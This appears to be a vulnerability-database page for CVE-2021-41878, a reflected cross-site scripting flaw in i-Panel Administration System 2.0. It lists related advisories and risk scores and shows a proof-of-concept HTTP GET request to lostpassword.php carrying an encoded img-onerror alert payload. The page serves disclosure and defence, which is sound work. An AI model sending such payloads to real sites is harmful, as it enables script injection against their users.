Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

i-Panel Administration System 2.0 - Reflected Cross-site Scripting Vulnerability

šŸ—“ļøĀ 13 Oct 2021Ā 00:00:00Reported byĀ Forster ChiuTypeĀ 
zdt
Ā zdtšŸ”—Ā 0day.todayšŸ‘Ā 136Ā Views

i-Panel Administration System 2.0 - Reflected Cross-site Scripting Vulnerability, CVE-2021-41878, Forster Chi

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin:IBM TRIRIGA Application Platform discloses possible path command execution(CVE-2021-41878)
27 Sep 202219:11
ā€“ibm
Circl		CVE-2021-41878
4 Oct 202116:23
ā€“circl
CNNVD		i-Panel Administration System č·Øē«™č„šęœ¬ę¼ę“ž
4 Oct 202100:00
ā€“cnnvd
CVE		CVE-2021-41878
4 Oct 202111:58
ā€“cve
Cvelist		CVE-2021-41878
4 Oct 202111:58
ā€“cvelist
Exploit DB		i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
15 Oct 202100:00
ā€“exploitdb
Hacker One		U.S. Dept Of Defense: XSS on ( ā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆā–ˆ.gov ) Via URL path
8 Jan 202306:35
ā€“hackerone
Nuclei		i-Panel Administration System 2.0 - Cross-Site Scripting
10 Jun 202605:11
ā€“nuclei
NVD		CVE-2021-41878
4 Oct 202112:15
ā€“nvd
OSV		CVE-2021-41878
4 Oct 202112:15
ā€“osv
Rows per page
# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
# Exploit Author: Forster Chiu
# Vendor Homepage: https://www.hkurl.com
# Version: 2.0
# Tested on: Chrome, Edge and Firefox
# CVE: CVE-2021-41878
# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html

As a proof of concept, an alert box can be generated with the following payload.
Exploit PoC:

GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
Host: Forster
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Connection: close

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Oct 2021 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 24.3
CVSS 3.16.1
EPSS0.15012
i-panelcross-site scriptingvulnerabilitycve-2021-41878forster chiuchromeedgefirefoxcybergrootalert boxpoc.
136